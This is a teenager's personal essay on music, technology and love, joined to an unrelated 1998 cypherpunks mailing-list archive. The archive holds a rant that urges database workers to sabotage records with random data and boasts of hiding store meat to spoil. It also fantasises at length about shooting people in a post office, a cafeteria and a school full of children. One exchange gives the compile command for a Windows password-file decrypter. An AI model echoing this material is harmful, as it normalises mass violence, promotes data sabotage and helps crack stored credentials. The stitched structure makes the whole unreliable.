Creativity can be destroyed from having a job.  Yes, crew, by getting a
job, your giving in (not completely, but somewhat) to corporate America. 
You just have to find a paying job that you totally enjoy.  If you do that,
then you'll never work a day in your life. 

For me, I'll be a train engineer.  I'd really like to be in a successful
music band.  We'd never sell out to anybody.  It'd be great.  I used to
really, really want to be a bird.  I'd want to fly around with a knapsack
on.  Inside, I'd have a walkman on that continuously played A-ha's Take On
Me and R.E.M.'s Losing My Religion.  I'd also have about 20 peanut butter
and jelly sandwiches.  That would be my perfect life.  

I feel like I've said so much about everything, but I haven't even began to
scratch the surface of some hot topics.  This is your preface to my
thoughts.  I'll do addendums as soon as they appear.

Addendum I - Microsoft as a Giant Wart

I was listening to Rush Limbaugh today, and he was talking about how
Microsoft puts this stupid new web browser on every computer no matter what
program you install.  For example, if you install a word processor it will
still install Microsoft Internet Explorer 4.0 (a stupid browser) on your
desktop.  Well, this is junk.  I think that computers are a waste of time,
especially in this time and day.  They should never have advanced past
pocket calculators, and mainly because they are too convenient.  Too many
people spend nice sunny days sitting in front of the Internet downloading
golf images, or pornography, or whatever.  Forget that.  I think that
people should sell their computers and buy a set of golf clubs.  Maybe you
should take that thousand dollars and get a pet and take a weekend trip. 
Computers are nothing but a headache.  Don't believe me?  Test this against
so many statistics and  experience.  Ask that accountant neighbor of yours
if he'd rather go for a swim in a pool or figure out some corporate tax
return information.  Ask that computer programmer how many times he's
visited another city on a trip that was only for pleasure.  Then, ask the
Park Rangers how much they love being outdoors.  You're bound to find that
most people hate technology in a raw form.  The most beautiful things on
this earth are found in nature, and not on some computer screen or in some
magazine.  Anyway, back to Microsoft.  Bill Gates is only partly to blame
for Microsoft's reputation.  Of course, he has a lot of pull in the company
since he is CEO and chairman, but realize that Microsoft is a huge company
and that he can't possibly oversee every individual aspect of it.  Sure,
they are accused of unfair trade practices, but a certain percentage of
that is acceptable (not every company can please everyone all the time.) 
But they do an awful lot of bad stuff (I can't give examples here because
they are too complex to explain), but a lot of that comes from regional
offices, etc.  So, Microsoft is a monopoly because they own almost every
aspect of computers today.  You almost have to use their software in
everything you want done professionally.  And a lot of computer users will
say that they really don't like that.  I have two options for you.  The
first one is, gulp, buy a MacIntosh.  The second (which I highly recommend)
is to sell your computer and buy a guitar. 

Addendum II - The Internet as a Tool

I'll grant that the Internet is an unboundless tool that almost any company
can incorporate.  Scientists can use it to collect data over the world,
share information, and express ideas.  Doctors can use it to find out more
about diseases by reading up-to-date information from around the world. 
But these noteworthy actions rarely occur.  Anyone who goes on the Internet
would have to agree that it really is a not-so-needed "tool" but more of a
world-wide haven for computer geeks.  It's mostly full of perverts who'll
have cyber-sex (cyber-sex is, by definition, when two people type actions
and thoughts to each other while mutually masturbating.  Sounds fun, eh?) 
Every America On-Line user knows what it is like to receive 20 messages per
day about free sex sites and porno distribution, or how to get rich quick. 
Nobody is safe from advertising and spam e-mail on the Internet.  In my
humble opinion, the Internet has "sold out."  It's just like your favorite
underground rock group.  Sure, you loved them as a local group and when
they had their own name.  But now they are playing wherever they can get
paid the most, etc.  It sucks.  The Internet used to be an elite
association of computer users (geeks and the normal people, too.)  But
Corporate America, namely Microsoft, has tried to put a footstep on each
web page out there.  For example, go to a search engine on the Internet (I
suggest Yahoo! or excite.com.)  They all practically do the same thing, so
it doesn't matter.  Instantly, you will see some  advertisement on that
page.  Now, in the search field, type in the name of your favorite band. 
Click search and wait for the responses.  Click on any one of several web
pages that will surely be devoted to the worship of that band.  You will
more than likely see a banner for some sponsor (who pays them a dime for
each person who clicks on it).  See?  Your independent down-home web pages
have been stamped, logged, and dated for Corporations to see.  Check this
out.  Go to www.microsoft.com.  There?  Microsoft now has your name, city,
state, and e-mail address.  Keep this up, and you can expect some e-mail
from some company wanting to sell you something really soon.  Sure, some
web pages don't really want your personal information, but they'd love to
sell it to some other company who would.  Welcome to the Internet.  A place
of boredom, dull information, sex, lies, and overweight people who still
seem to fit into a size 4.

Addendum III - Music as an Influence

Music is one of the most extraordinary mediums in the world.  It's a unique
language that is universal and ancient.  I'm sure that some idiot (the
first man, and even the modern man) sat on a rock and beat a club on the
ground and thought, hey, I should for a band.  So now we got four poor
musicians who'll do anything for a gig.  They're making music that they all
love and life is grand.  These are good guys.  These are the guys that have
a heart for something that they love and they won't let the world stand in
between them and their dreams.  It's the same way with almost all artists. 
Nobody can really enter the world of art expecting to be a success or a
failure.  But what every person should know is that they can enter the
world of art and be prepared to grow and learn from what happens.  I know
that some of the simple photographs that I've seen in my life have changed
the perspective on things for me.  And the songs I hear can most definitely
have a major impact on my thoughts and actions.  It's simple to see this in
everybody.  You know how that fast song with lots of energy comes on, and
before you know it, you're driving 65 in a 30, "feeling the flow.  Working
it."  It's a great feeling.  Something that is irreplaceable (but
definitely not not exceedable.)  Radiohead, R.E.M., and The Velvet
Underground are probably the only bands which I've ever felt really
connected to.  They all deliver a great message to me, and send that
message on wondrous instrumental works of art.  R.E.M. gave me the
advantage of feeling without experience.  Lou Reed's simple minded
complexities were great wisdom that I think of daily and is really involved
in a lot of "What Goes On."  (That's a song title to a Velvet Underground
song, by the way.)  And lastly, Radiohead has shown me the world about.  It
conquered my fears and it has really been a guide in the direction of my
life.  I understand through that music what may lie in the future.  It
really woke me up to quick thinking that my life can be what I make of it. 
No one can hold me back from doing what I really want, but some of us 
aren't quick to realize that we can hold ourselves back if we don't act on
our judgments and if we don't get motivated to do what we want.  I'd
recommend those three CD's to any person in the world.  Get all the live
Velvet Underground you can and listen to each work like it was an important
message coming over the telegraph.  Write those words down, read them over
and over, then hang them on the walls of your bathroom.  Keep a poster of
Michael Stipe in your bedroom and stare at it while you listen to R.E.M. 
And watch the nightly news after you've listened to Radiohead and apply
your common sense to a world of chaos.  "It's a Man Ray kind of sky.  Let
me show you what I can do with it."

Addendum IV - Calvin and Hobbes

This cartoon is so great to me that I just had to mention it here.  The
humor, wit, and philosophy that Bill Watterson so ingeniously portrays
through his cartoon characters is unparalleled in my opinion.  Calvin in a
six year old boy who knows the perils of elementary school and having
parents, and daydreams about dinosaurs in rocket ships.  If you've never
read any of the work, you're missing out on a life-changing set of books. 
I used to anxiously await each and every new release of the next book. 
It's so great.  Anyway, back to our characters.  Calvin is a witty, scary,
typical six year old boy.  His awesomeness lies in his incredible knowledge
of things he knows nothing about.  He picks up a great vocabulary from
television and books, but is a terrible student in school.  His stuffed
tiger, Hobbes, is the wise leader of the two (although Calvin claims to be)
and is very smart.  The conversations the two have and the experiences they
share open different doors in my mind and soul.  From downright hilarious
strips to sad ones that pull your heart into Calvin's, I'm sure that you
won't regret reading anything that Bill Watterson has to put out.  I also
admire Bill Watterson because he didn't sell out.  He fought syndication as
long as he could, and quit writing Calvin and Hobbes because of the
problems he had with the Corporate monsters who wanted Calvin T-shirts,
stickers, figurines, etc.  Screw that.  Calvin and Hobbes will always have
an eternally open field to gambol in inside of my heart. 

Addendum V - Love

Love is a feeling that people feel when they have a special devotion
towards someone.  I am flawed in the fact that I must always feel loved by
a special someone.  It's not so bad, I guess, but loneliness is an empty
feeling which I hate.  A relationship at a young age (the only thing I'm
experienced at) can be fulfilling or detrimental to a person's happiness. 
Some teens grow up all there life on their own and can depend on themselves
solely.  Others of us need a special friend or girl/boyfriend to help us
along the way.  I think I'm that latter, but the girlfriend/boyfriend thing
isn't like having an extra set of arms.  To me, having  a relationship with
someone else can be either an escape where you can throw your blues into
the air and forget about them, or it is a place of comfort where you can
get help with your problems.  Whatever it is at that certain aspect of
time, a very special bridge can build between your heart and that
significant other.  As a young person, it is necessary that we recognize
that life is long and that this relationship most likely isn't one of
eternal reward.  But, we put our hearts into it strongly and we hope that
we never part from that special person.  It's easy to get hurt in a
relationship, and a lot of times, that pain will carry into other
relationships further down the line.  Some people choose to take dating
lightly, and to make high school relationships just fun little dates. 
That's fine also.  It might be best because it keeps hearts from breaking. 
But, I must admit that I need to be loved (just like everybody else does.) 
And I can't keep myself from falling for girls who care, are adorable, and
who are fun to be with. 

The downfall that I've so hardly been hit with is the haunting of ex-dates.
 I broke up with a girl after 2 years, and let me tell you, sometimes it
comes back to haunt me.  I can't express this in words, you'll have to
experience for yourself.  But trust me when I say that you won't stop
thinking about him/her just because you broke up.  You compare stupid
things (and I mean stupid) to what he or she did or was like.  And it's so
annoying.  You'll learn to despise it. 

Addendum VI - Anti-Technology (and what to do about it)

Technology should be feared.  Not for what it is, but for what it can
become.  Trains, planes, and automobiles were only the opening of a new
gate that will open to endless technological takeover.  In my opinion, we
are creating, building, and capitalizing on something that may eventually
lead to our downfall.  The world in which we have created has resulted in
laziness, etc.  What's technology?  First of all, we need to clearly get in
your head what my definition of technology is.  Technology is the
inventions that do not use a man's energy and convert it, but use energy
from the world.  Often times, it's wasted energy.  Nuclear weapons,
toasters, and other machines that we have so great a deal of are a waste of
time and money.  It's funny that I say these things because I am a big user
of technology.  I have a TV, a VCR, a telephone, a toaster, a car, a
computer, and even a air conditioner.  How's that for comfort?  Yes, I do
contradict myself, but I could survive in a hut with a fireplace just as
well.  It doesn't matter if I did live in a hut either.  It's worthless to
set that example without first making clear what I was trying to prove. 
Maybe if this ever gets published into a nationwide best-seller, I can
start an au naturale community out west somewhere. 

What can I say to do about technology?  Succumb.  It's all  relentless. 
Besides, rebellion isn't in style this generation. 

Addendum VII - The Continuing Trilogy of Intelligent Music

The intelligence of the music by the Talking Heads and David Byrne is
overwhelming.  The spoken words of Thom Yorke of Radiohead can rinse your
head out.  The wonderful emotion stored in Pink Floyd's music is wondrous
too.  And here is where the trilogy began.  Although I don't consider
myself any great genius about any of these bands, they all have a link.  In
the 70's, Pink Floyd was a musical takeover.  It started this all.  I was
considering adding The Velvet Underground and Lou Reed to this, but they
don't qualify.  They didn't have such a common theme.  Pink Floyd created
the movie, "The Wall," and it was theirs.  In the 1980's, David Byrne and
The Talking Heads added a great amount of genius and through music,
mesmorized what has become an elite and intelligent bunch of listeners. 
Byrne's movie, "True Stories," made me realize what this was all leading
to.  I don't completely understand it myself, and I think it's up to each
individual to decide and to keep watching.  Radiohead has continued by
creating movie with a scary tone because of their view of the world.  They
have yet to create a movie, but we must remain eager for them to do so. 
It's a must.  This addendum won't make any sense to you unless you see the
two movies and listen to quite a bit of the music of each band.  And listen
to the words are fit them to your view of the world and combine all that
muddy water to the dirt that I put in this.  How's that for deep, dark
waters?
Addendum VIII - Photography

Photography, I just want to mention, is a wonderful medium where art can be
captured.  Without it, all of us who can't paint or draw would be artless. 
There is no such thing as a bad artwork.  People who tell you that your
artwork is junk have a hole in their spirit or don't understand. 
Everything in the world can symbolize something else.  Just hold onto your
artworks.  Feeble as such, a cheap blanket from your childhood can bring
tears to your eyes, and a 25 year old photo of a high school love can make
you appreciate times you've had and make memories wondrous.  Taking classes
on photography can be great.  Learning to master the tools is necessary to
fully, completely understand anything.  But getting a grade on photos for
content is damaging.  I don't believe that you can grade anything like
that.  I respect all photographers because it's more and more becoming a
rarely used art medium and it should be just as respected as painting and
etc.  Emotional outlets and ideas can't be graded, and it is dangerous to
manipulate, bias, or fend against that.  It's like trying to stop hot water
from pouring out of an open faucet. 

Addendum IX - Great Quotations
 
"They can't tell the difference between working and not working.  There's
no concept of weekends anymore."
			- True Stories

"The only thing to fear is fearlessness.  The bigger the weapons, the
greater the fear."
			- Michael Stipe (Hyena)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Wed, 6 May 1998 22:26:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Spam
Message-ID: <bd3d74fe.355145bf@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi cyphers, I'm back.  A certain 'nobody' invited me!  ;-)


Apparently only as far back as 1993, the definition of the word "spam" from
the on-line jargon file was this (according to the New Hackers Dictionary) -

spam [from the MUD community] vt. To crash a program by over-running a fixed-
size buffer with excessively large input data.  See also Buffer Overflow,
Overrun Screw, Smash the Stack.


Obviously that definition has changed since then.  I've seen it go from that
to repetitive commercial advertising, and I've seen it used to brand someone
as an outcast of a list for future removal simply because a small minority
didn't like what that person had said (so it was being used at that time to
mean 'objectional material').

And in all the times I've seen the word fly, there has never been anykind of
volume that would come close to overblowing the forum's mechanical
capabilities.


So, I'm curious as to who/what dictated the meaning of that to change so
drasticly.  Write me in private if it's off-subject (and yes, you can write me
anonomously if you don't want a response. :-) )


Also, new address for my website -

Stan,
Stan and the Sequencers
http://members.aol.com/StanSqncrs/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Thu, 7 May 1998 01:18:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dog Log - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <35516EC7.3EAF@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dog Log - SPACE ALIENS HIDE MY DRUGS!!!
_______________________________________

From: "William H. Geiger III" <whgiii@invweb.net> 
To: Eric Otot <emc@wire.insync.net>  
Cc: cypherpunks@cyberpass.net 
Subject: Re: The Borg Arrive 
 
-----BEGIN PGP SIGNED MESSAGE----- 
 
Eric Otot said: 
 
>So I have the choice of going somewhere inconvenient to
>shop, shopping at Rite Aid and paying full MSRP for every
>single item, which hardly any store sells stuff for, or
>getting the incentivized mandatory/voluntary barcoded card,
>and letting the Borg link me with everything I buy, down 
>to each and every sheet of toilet paper I use to 
>wipe my butt with. 
>  
>Beware the Borg.  Coming soon to a neighborhood store near
>you. 
>  
>P.S. I went with the card.  
So lets get this straight: 
 
    You don't like a companies efforts to gather marketing
statistics on its customers but due to your own *sloth* you
not only continue to shop there but you also fill out the
forms for them to track every purchase that you make! 

 
    I am sorry but as hard as I try I can not generate the
least bit of sympathy for you. Sheeple are sheeple because
they act in the manner that you just outlined in your
message. Bitch, whine and moan that the store tracks what
brand of toilet paper they buy but if in exchange for $0.10
off 4 rolls and they will give up their entire life story. 
 
    Sheep get sheered because they don't know any better,
sheeple get sheered because they deserve it. 
 
 ------------------------------------------------------------ 
William H. Geiger III  http://users.invweb.net/~whgiii 

Geiger Consulting    Cooking With Warp 4.0 
 
Author of E-Secure - PGP Front End for MR/2 Ice 
PGP & MR/2 the only way for secure e-mail. 
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html 
------------------------------------------------------------

  
Tag-O-Matic: I use OS/2 2.0 and I don't care who knows! 
 
-----BEGIN PGP SIGNATURE----- 
Version: 2.6.3a-sha1 ZZZCharset: cp850 
Comment: Registered_User_E-Secure_v1.1b1_ES000000 
 
iQCVAwUBNUp/Ko9Co1n+aLhhAQHRpwP+OVypg6sRgZMAqW6NmaTexoqoRt4z3zxK 
lhQ6HGvmDMxIGqdS5vPPHw+kZPjtJbkxAWamoi6EtOccbv/3otl2bjuFPNBNMYD+ 
p7nMAhdZDk1zsgiiUhSzp3ZcREcFIy8Ybnu6u4xYf/wgueg26cW+JE8A5iyeJMOz 
6dHT6oBT2IE= 
=u1mU 
-----END PGP SIGNATURE----- 
 


  God bless WillyG III!
  Eric Otot wrote a reply to WGII's caustic post which
gave a perfectly reasonable account of his preference for
picking which 'battles' were worth his while to engage in,
and which would be merely pissing in the wind of the
masses rushing by to save their dime for the GreyHound
restroom.
  I chose to omit EricO's reply and spell-correct WGIII's,
in order to preserve the point made by his post, without
lessening the post's effect by letting it be obvious that
WG3 is an uneducated, redneck, barefoot hillbilly who has
no 'manors'...
  I did so for the simple reason that Eric Otot's perfectly
reasonable erudition of his postion on the imposition of

identity-tracking techonlogy, although being a perfectly
valid justification of the need for concentration of
resources, is a position that millions or billions of
perfectly reasonable people are capable of reasoning for
themselves.
  Fuck 'reasonable'...



  Eric Cordian, a much wiser and more perceptive member of
the CypherPunks list than Eric Otot, though less easily
amused, elucidates one of the many reasons why it may
be unreasonable to remain reasonable in one's reasoning in
regard to what one must take under consideration when 
deciding the imortance, or lack thereof, of refusing to
submit to the increasing intrusion of technology into our
lives in return for what are often marginal benefits.

From: Eric Cordian <emc@wire.insync.net> 
Subject: Re: The Borg Arrive 
To: cypherpunks@cyberpass.net  
 
Steve Schear writes: 
 
> Many of the large grocers in my area have also gone to
> 'club' cards as a means of data mining and loyalty
> promotion.  However, the procedure for joining such clubs
> is open loop, in that the cards are issued at the POS 
> and no check is made of the information your provide. 
> All of mine are pseudoanonymous.    
For the time being.   
 
However, that could change once all retail outlets are 
MarkOfTheBeast-Enabled. 
 
Infrastructure is infrastructure, after all.  
 
--- 
Eric Michael Cordian 0+ 
O:.T:.O:. Mathematical Munitions Division 
"Do What Thou Wilt Shall Be The Whole Of The Law" 
---

  An interesting, widely unknown part of the Club Card
equation is that, even if an individual does not 'provide'
the vendor with the Mark of the Beast (SSN), those who
control the databases involved 'add' MotB/SSN information
from widely available 'lookup' sources.
  As well, the Corporate Beast seems to have learned a few
tricks from the Government Beast. Just as the government
takes your money as Federal Taxes and then uses it to 'buy'
the compromise of your 'State rights' under the guise of
matching federal funding, the corporations merely raise
their prices and then give the customer a 'rebate' in
return for registering for the Yellow Star Club Card.
  During my recent Soft Target Tour of Tucson, I used my
base-player's Safeway Club Card, but I always made a point
of going to the adjoining Walgreen's first, to get those
things on my list which they sold, before going to Safeway.
I cannot recall a single item which I bought at Walgreen's
which was not a higher price at Safeway, unless one used
the Club Card, whereupon it 'magically' became exactly the
same price as the item was at Walgreen's.

  When shopping for myself, I refuse to play the 'Savings
Club' game, for the same reason I don't sell my butt behind
the GreyHound Bus Station for a paltry sum of money.
  Instead, I spend a few more dollars paying the inflated
prices, and I leave a few expensive cuts of the store's 
meat products in a location where they won't be found for
a few days.
  In essence, I pay more as a result of the Sheeple's 
actions, and they pay more as a result of mine.


  Tim May, a 34th Generation May Son and a licentious
proctologist, has turned his multiple personality affliction
into an overall benefit to the quality of his life by
singlehandedly creating and maintaining all of the various
personas that make up the CypherPunks list subscriber
membership, maintaining the list archives, singlehandedly
inventing all CypherPunks technologies under his 'Tim May'
persona, and keeping his remaining personas in line by
referring them to the 'archives' every time the subordinate
personas try to take credit for legendary CypherPunk
concepts such as 'sliced bread' and the 'wheel'.
  Despite being the only real subscriber to the CypherPunks
list, he manages to not only singlehandedly run all of the
Bay Area CypherPunks Physical Meetings, but also to put into
practice the MeatSpace manifestations of the concepts he
espouses, by methods such as discussed in the following:


To: Eric Cordian <emc@wire.insync.net>, cypherpunks@cyberpass.net 
From: Tim May <tcmay@got.net> 
Subject: Re: The Borg Arrive 
 
At 6:05 PM -0700 5/1/98, Eric Cordian wrote: 
 
>A few weeks ago, however, Rite Aid did something which was
>not merely mildly annoying, but actually threatening to my
>privacy. 
> 
>I walked into the store, and noticed that every sale tag 
>in the store had been embellished with fine print
>containing the words "(With your Rite Rewards Card)" Giant
>banners proclaimed that this card was free and could be 
>obtained by simply filling out a little form, available 
>at any register.  This form required your name, address, 
>apt, state, zip, phone number, and date of birth, and the 
>card was barcoded.  
Did you miss the discussion of the Kalifornia Solution? 
 
At physical meetings and parties we _exchange member cards_ 
randomly. 
 
A persona hit upon this after I was showing my "Safeway" (a 
major Kalifornia-based chain in 46 of the 57Semi-Autonomous 
Republics) and describing how we can execute a Chaumian 
exchange. As the cards are just cards, with no photo and no 
obvious I.D. attached, such exchanges are easy. 
 
>Beware the Borg.  Coming soon to a neighborhood store near you. 
> 
>P.S. I went with the card.  
But of the cards I have, all are filled out illegibly or 
have been traded multiple times. Identity entropy is an 
interesting concept. 
  
--Tim May 
  
"The tree of liberty must be watered periodically with the
blood of tyrants...." 
---------:---------:---------:---------:---------:---------:---------:---- 
Timothy C. May              | Crypto Anarchy: encryption, digital money, 
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, 
zero 
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information 
markets, 
Licensed Ontologist              | black markets, collapse of 
governments. 


  Federal US Marshall Clow, famous as the LEA who finally 
brought the Blues Brothers to Justice and Ray Charles to
Blind Justice, suggests that Identity Entropy Warriors
use the addresses of the the secret lairs of the Circle
of Eunuchs and the Army of Dog in filling out all forms,
so that the UCE/Spams they so dearly love can be forwarded
to them after InfoWar has driven them underground.


To: Rabid Wombat <wombat@mcfeely.bsfs.org>, Martin Minow 
<minow@apple.com> 
From: Marshall Clow <mclow@owl.csusm.edu> 
Subject: Re: The Borg Arrives 
Cc: cypherpunks@cyberpass.net 

At 8:45 AM -0700 5/1/98, Rabid Wombat wrote:
>On Fri, 1 May 1998, Martin Minow wrote:  
>> <Eric Cordian <emc@wire.insync.net> accepts a loyalty 
>> card and complains  that he has lost his privacy. 

>> So, do the Cypherpunks thing -- get another card and use 
>> that sometimes. 
>> In fact, have all your friends get cards and, whenever
>> you get together throw your cards in a pile and take new
>> ones away with you 
> 
>> ps: did you actually sign your real name? If so, we're
>> going to take away your secret decoder ring.  
> He used his real address. Now they know where to find 
> his cat ...

Try 
	1060 West Addison; Chicago IL  (Wrigley Field) 
or	70 Brookline Dr.; Boston MA    (Fenway Park) 

-- Marshall
Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

"I predict future happiness for Americans if they can 
prevent the government from wasting the labors of the
people under the pretense of taking care of them."
---Thomas Jefferson


  Although Marshall Clow ends his post with a grotesquely
misquoted statement from Thomas Jefferson--whose original
quotations in regard to government invariably contained
words such as ratfuckers, cocksuckers, slimeballs, jerkwads,
etc.--it nonetheless reflects the type of subterfuge that
Jefferson foresaw taking place in the sphere of government,
which is today being mirrored in the methodologies of
corporations worldwide.
  The 'federal matching funds' and 'club card savings' scams
are but one example of the reasons that an increasing number
of citizens, such as Tim May, are finding it necessary to
undergo training in proctology, in order to figure out just
what the hell governments and corporations are *doing* back
there...


  The preceeding illustrates what individuals and small
cells of Army of Dog Warriors can do to throw an element
of misdirection into the increasing number of tracking
mechanisms being put in place in our daily lives.
  However, these effect of these types of resistance to the 
digitalization of humanity are generally far outweighed by
the mindless SheepleDom of the masses in allowing themselves
to be herded unquestioningly into an endless variety of
feeding pens where they are expected to feed on corporate
products and, in turn, be fed upon by the government.

  Of much more effect are the actions of potential Army of
Dog Warriors who are in positions which allow them to add
misdirection to the digital equation at a level which can
throw a Major Screw into the machinery.
  System Administrators, DataBase Managers, Tech Support
personnel, software and hardware Programmers and Developers,
are all in a position to enter random numbers into the
structured equations designed to monitor and track an
increasing number of individual citizens whose lives will
be documented in increasing detail in an ever-widening
network of corporate and government databases.


Tim C. May Owes Me $ .05 As His Share Of The Money That
Was Ripped Off From Me By Sun MicroSystems By Selling
Me An Operating System Which Was Written By University
Students Who Put Comments In The Source Files Which 
Made Fun Of People Over '30':

  Tim--I paid Deloite & Touche $ 60,000 to do a Quality
Control Analysis on my life, in general, and their report,
which is the equivalent of borrowing my watch to tell me
what time it is, indicates that the posts you have made
to the CypherPunks Disturbed Male LISP since 7 Dec, 1989,
are worth $ .03, so as long as you send me your $ .02 worth,
we can call it even, and I won't have to launch an assault
on Mayonnaise Mountain and put my SPARCard 2 where the
Sun MicroSystems don't shine...


The Bottom Line, Version 9.9, Revision 0.0:
  It's my birthday, I'm halfway through a bottle of
Glenfiddich, Cask Strength (51% alcohol) Scotch, which is
produced in Dufftown (Home of 'Duff Beer', Homer Simpson's
drink of choice), Banffshire (Just outside of Calgary, AB),
Scotland (An independent Cirle of Eunuchs/Army of Dog
Republic often referred to as 'The Texas of the British
Empire').
  My Dad gave me a birthday call, during which he informed
me that his talks with the RCMP revealed that Canadian
Customs can hold my computers, etc., up to 90 days before
exorcising their option to put their dick up my ass, and
then hold it for the fifty years during which the outcome
of any further court proceedings are decided.
  I totally flipped out, screaming all kinds of self-
incriminating utterances which prove conclusively that
I am a danger to the lives and lifes of decent, Dog-
Fearing MeatSpaceIzens everywhere, even though I am
fully aware that my electronic communications are being
monitored by those who will be 'between a rock and a hard
place' when they have to decide whether they should admit
to their illegal, surrupticious surveillance of my life,
since birth, which would prove that my extreme paranoia 
validates my 'sanity defense', or to pretend that they 
are just a loosely-knit organization of semi-competent
traffic-ticket writers who have no idea what this silly,
paranoid fool is talking about, validating their claim 
that I should be committed to an internment camp for the
Delusionally Politically Incorrect, and that the evidence
confirming the reality of the basis of my nonsensical 
blatherings should be chalked up to 'mere coincidence'.


For Professional Mathematicians Only:
1. Estimate the number of times I have 'twitched' in
between the time I screamed at my Dad that the RCMP
are not the only ones in possession of firearms.
2. Divide this estimate by the number of times I have
gotten laid since 1992 (Hint: '0').
3. Add the number of times that Toto has forged posts
to the CypherPunks list, using your name.
4. Subtract the number of ASCII-Art spams sent to the
list since July 31, 1999 (Hint: 'The same as answer #2').
5. Multiply by Franklin's Fudge Factor.
6. Plot Pinkerton's Probability Point.
7. Ask yourself, "How many stops did the train make?"

  An accurate calculation of the undescribable, inane,
indiscrimate insanities enumerated above, will, if 
divided by the value of Pi legislated by Congress,
provide the number of bodies it takes to spell 'Einstein
Was Crazy'.
  While this in no way relates to valid CypherPukes issues
such as Craptographics or Piracy, it is essential to the
issue of exactly when this chapter of 'SPACE ALIENS HIDE
MY DRUGS' ceased to follow the pre-ordained path which
the Tao was directing it toward, by way of CensorShip
by the Cosmic Muffin, and became a meaningless diatribe
during which I tried to disguise the fact that I am 
jumping up and down, screaming "KILL, KILL, KILL!!!"
and putting my head through the walls of my home in
an increasingly futile attempt to prevent myself from
stepping beyond the boundaries of the social programming
provided by the Secret Government Agents Cleverly 
Disguised As Teachers and emptying the clips of several
dozen illegal firearms into the MeatSpace boundaries of
a Post Office, a Luby's Cafeteria, and a Schoolhouse
Full Of 'Innocent Children Who Would Eventually Murder
Their Parents If I Didn't Slaughter Them, Anyway' To
Be Named Later.


  The concept of the Army of Dog assumes that the 
majority of DogIzens will be sufficiently sane to
direct their rEvolutionary thoughts, feelings and
actions in a direction which will result in the
BioSemiotic Evolution of Humankind moving forward
to an increasingly logical and humanistic future.
  If a few MadDogs such as myself have to be put
down by LEA CypherPunks, and a number of Sheeple
need to be Nuked by Timothy C. McCypherPunks, then
it is a small price to pay for ensuring that SpamFord
will be free to compete with Dimitri's ASCII-Art and
Fuck@Yourself.Up's Trojan Horses for the attention of
CypherPunks Disturbed Male LISP Mambo'ers who have
remained subscribed to 'cypherpunks-unedited@toad.com',
in order to document the 'Secret Conspiracy Against
The CypherPunks List' that is being perpetrated by the
Commie Schill, Ignoramus Chewed-Off, the Awe-Stun-Taxes
WebMasturbator, James ChokeTheMonkey, and A Nietzsche
Nazi Racing Across The Tundra In A Snowmobile To Be
Named Later.
  When all is said and done, it matters little that
the Violent Armed Thugs who comprise the Dudley DoWrong
Division of the RCMP are incapable of setting up and
railroading an individual who is half as smart as his
dog. What matters is that they can shoot his sorry ass,
move the body to the nearest Reservation, put a skirt
on him, add the body of dead, young Native child with
a tube of glue in his hand, and launch an internal
investigation by their BumBuddies (TM) that will show
them to have followed Proper PoliceMurder Procedure.


Now For The 'BAD' News:
  As you have probably guessed, given the obvious
degeneration of this rambling diatribe into an
incoherent 'Rage Against The Machine', I have 
finally sunk into such a depraved condition of
violent insanity that any astute judge of the
human condition can easily predict that the next
chapter of 'SAHMD' will tell The Truth, The Whole
Truth, And Nothing But The Truth.

  Please read it, anyway...
  If you constantly remind yourself that I am a 
madman, then you can relegate what I have to reveal
to your subconsious, and continue to chop wood and
carry water without feeling obligated to join me in 
an assault on everything that righteous, Dog-Fearing
Netizens hold sacred.

The Retribution is NOW!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: muad@iname.com
Date: Thu, 7 May 1998 02:00:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: password.pwl
Message-ID: <199805070900.FAA04899@web02.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain


I have the source code for glide.c the decrypter but i dont know how to run the program.
Therefore i need your help in this.


---------------------------------------------------
Get free personalized email at http://www.iname.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J-Dog <J-Dog@Elitehackers.org>
Date: Thu, 7 May 1998 07:42:06 -0700 (PDT)
To: muad@iname.com
Subject: Re: password.pwl
In-Reply-To: <199805070900.FAA04899@web02.globecomm.net>
Message-ID: <Pine.LNX.3.96.980507073527.5176A-100000@J-Dog.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


gcc -o glide glide.c

Latez
JD

On Thu, 7 May 1998 muad@iname.com wrote:

> I have the source code for glide.c the decrypter but i dont know how to run the program.
> Therefore i need your help in this.
> 
> 
> ---------------------------------------------------
> Get free personalized email at http://www.iname.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Thu, 7 May 1998 08:01:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Spam
Message-ID: <9805071457.AA20574@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


Stan the Sequencer sez:
> Apparently only as far back as 1993, the definition of the word "spam" from
> the on-line jargon file was this (according to the New Hackers Dictionary) -
> 
> spam [from the MUD community] vt. To crash a program by over-running a fixed-
> size buffer with excessively large input data.  See also Buffer Overflow,
> Overrun Screw, Smash the Stack.

This isn't quite accurate.  The term "spamming" in Mudding has always meant
inundating the players with repetitive material, whether intentionally
or accidentally, and has been used in that sense since sometime around
1990 at least.  The "overflow" is of user screens, not stacks or
buffers... although of course any high usage like that can test a
program's limits.

I just wrote and snipped a long disquisition on the history of spam starting
with Clarence Thomas IV in 1993, having realized it's probably not relevant to
your interests and old hat to everybody else.  Suffice it to say that spam
does require extra resources to process, both in hardware and time.  We resent
it because the end user is paying for it rather than the advertiser, so there
is no natural limit to the amount of crap they can pour on us.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 7 May 1998 07:41:06 -0700 (PDT)
